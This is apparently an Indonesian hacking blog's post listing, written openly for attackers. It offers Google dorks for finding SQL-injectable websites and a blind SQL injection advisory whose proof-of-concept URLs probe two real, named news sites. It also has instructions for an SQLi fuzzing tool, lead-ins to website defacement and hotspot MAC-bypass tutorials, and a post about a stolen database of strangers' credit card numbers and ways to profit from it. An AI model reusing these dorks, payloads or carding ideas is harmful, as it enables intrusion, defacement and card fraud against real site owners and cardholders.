Dork SQLi 2010
monggo, gan!!! Dork anget2[ad yg basi jg....hehehee] buat praktek suntik SQL….
allinurl: \”index php go buy\”
allinurl: \”index.php?go=sell\”
allinurl: \”index php go linkdir\”
allinurl: \”index.php?go=resource_center\”
allinurl: \”resource_center.html\”
allinurl: \”index.php?go=properties\”
allinurl: \”index.php?go=register\”
inurl:trainers.php?id=
inurl:buy.php?category=
inurlallinurl: \”index php go buy\”
allinurl: \”index.php?go=sell\”
allinurl: \”index php go linkdir\”
allinurl: \”index.php?go=resource_center\”
allinurl: \”resource_center.html\”
allinurl: \”index.php?go=properties\”
allinurl: \”index.php?go=register\”
inurl:trainers.php?id=
inurl:buy.php?category=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
Nice F.A.Q by:mod.echo
Baru sejam daftar jd membernya Echo(forum hacking yg dah masyur namanya), nggak sngaja bukak2 link yg ada di forum & salah satunya ada F.A.Q bikinan moderator yg gw lp inisialnya, judulnya “7 hal mematikan yang membuat IT sekuriti Indonesia mengalami kemunduran”… Silahkan dibaca & direnungkan!!! Baca entri selengkapnya »
Kode-kode Rahasia Handphone
Okeh, skedar pengetahuan tentang kode2 yg bs di-eksekusi pd ponsel kalian.
Jangan nyangka gw teknisi HP, nih artikel gw dapet dr google.
Kode Rahasia Umum Symbian
*#06# Melihat IMEI
*#0000# Melihat Versi sofware
*#9999# Melihat Versi sofware
*#7370# Soft Reset
Untuk Hard reset: Tekan Tombol hijau, 3 dan * ditekan bersamaan, tekan tombol power. Password standar 12345
*#92702689# Melihat info tanggal perbaikan
Kode Rahasia Umum Java
*#7380# Reset atau Restore Factory Setting Nokia seri 40
*#7370# Reset atau Restore Factory Setting Nokia seri 60
*3370# Untuk restart ponsel Nokia 3310
*#7220# Mengaktifkan GPRS PCCCH
*#3925538# Menghapus Wallet di ponsel Nokia 6610,63101, data Wallet terhapus semua
*#67705646# Menghapus operator logo di ponsel Nokia 3310 & 3330
Refreshing with Javascript
Skedar untuk me-refresh blog ini… Lumayan lah bikin diem adek kt yg nangis!!! wkwkwkwkwkw…….
Copas aja kode dbawah ini di addressbar kalian…
1.edittable web local machine
javascript: document.body.contentEditable = ‘true’; document.designMode = ‘on’; void 0
Hispanic Digital Network Blind SQL Injection Vuln
[o] Hispanic Digital Network Blind SQL Injection Vulnerability
Software : Hispanic Digital Network
Vendor : http://www.hdnweb.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
[o] Vulnerable file
news.php
[o] Exploit
http://localhost/[path]/news.php?nid=[Blind SQL]
[o] Proof of Concept
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4 = false
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5 = true
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=4 = false
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=5 = true
[o] Dork
“powered by Hispanic Digital Network”
[o] Notes
fucking private script again and all target are in one IP address. lol
Schemafuzz.py[SQLi Tools]
Source:::v3n0m@YCL
Aplikasi yg dibutuhin:::
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.CMD
Dg cmd masuk ke folder tempat schemafuzz.py berada…
Awali pertintah dengan format:
schemafuzz.py -u “url target” –perintah
List perintah ada dibawah…
SQL Google Search Tool
SQL – Google Search??
Tools ini gunanya buat nyari web2 yg bs kita suntik. Stelah sy liat skripnya, ada 4 vulnerable yg diuber2 ma tools ini, MySQL Injection, MS Access Injection, MSSQL Injection, & Oracle Injection. Lumayan buat tambah2 koleksi deface…
Baca entri selengkapnya »
Meth0d Sok Suci…
Malem2 nggak ada kerjaan…liatin database shop online yg isinya ratusan data2 kartu kredit orang bule. Bingung…bner2 bingung mo diapain lg kartu sbanyak ini.
Dicairin nggak bs, buat order, jarang tembusnya…
10menit mikir,akhirnya otak nemu meth0d unik yg sdikit konyol, tapi agak suci….
Akhirnya sy ikut program afiliasi yg disediain ma webshop klas internasional, amazon.com…
SQL Injection
Assalamoalaikom!!!
Wokehh, mumpung tugas2 kuliah dah pada cair, sy tulis tutor buat temen2 [khusus] sesama N3ubie yg pengen blajar deface website!!!
Apaan tuh deface??? Halah, golek dewe neng Google!!!![cari sendiri di Google!!!]
Apa aja yg dibutuhin??
1. Notepad/Wordpad/kertas ma bolpen!!!Brakwkwkwkwkwkwkwkwwk…..
2. http://home2.paulschou.net/tools/xlate/ >>>>> ntar gw kasi penjelasan kegunaan dr halaman tersebut…
Bobol Proteksi HotSPOT [ bukan password ]
Assalamoalaikom, gan!!!
Sperti yg kita tahu[moga2 dah pd tau], HotSPOT ato tempat akses internet Wireless dgn standar 802.11 b/g sudah bukan barang asing lagi ditelinga kita, dan bila kita pergi keWarungKopi, Mall, Hotel, kantor, ato Cafe, dengan mudah kita bakal nemuin fasilitas HOTSPOT tersebut. Ada tapinya…. tidak smua penyedia layanan menawarkan fasilitas internet Wireless secara gratis, atau kalopun gratis, sangatlah terbatas. Salah satu proteksi yg digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.
